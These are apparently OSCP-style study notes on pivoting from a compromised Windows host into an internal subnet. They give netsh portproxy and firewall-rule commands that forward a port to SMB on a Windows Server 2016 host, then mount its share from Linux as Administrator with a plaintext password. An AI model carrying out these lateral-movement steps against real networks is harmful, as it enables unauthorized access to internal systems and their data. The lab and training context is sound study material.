Window is compromised with privilege escalation. in addition to being connected to the current network (10.11.0.x), it has an additional network interface that seems to be connected to a different network (192.168.1.x). In this internal subnet, we identify a Windows Server 2016 machine (192.168.1.110) that has TCP port 445 open. (there are certain requirement which can be read in oscp material)
- we will use the netsh (interface) context to add an IPv4-to-IPv4 (v4tov4) proxy (portproxy) listening on 10.11.0.22 (listenaddress=10.11.0.22), port 4455 (listenport=4455) that will forward to the Windows 2016 Server (connectaddress=192.168.1.110) on port 445 (connectport=445):
netsh interface portproxy add v4tov4 listenport=4455 listenaddress=10.11.0.22 connectport=445 connectaddress=192.168.1.110
- Firewall will disallow inbound connections on TCP port 4455 which can be solved by adding rule
netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=10.11.0.22 localport=4455 action=allow
- configure samba on linux Local port forwarding
- check tunnelling success, smbclient -L 10.11.0.22 --port=4455 --user=Administrator
- It will show a error, this error prohibits us from listing workgroups but it does not impact our ability to mount the share
sudo mkdir /mnt/win10_share
sudo mount -t cifs -o port=4455 //10.11.0.22/<sharename> -o username=Administrator,password=Qwerty09! /mnt/win10_share
ls -l /mnt/win10_share/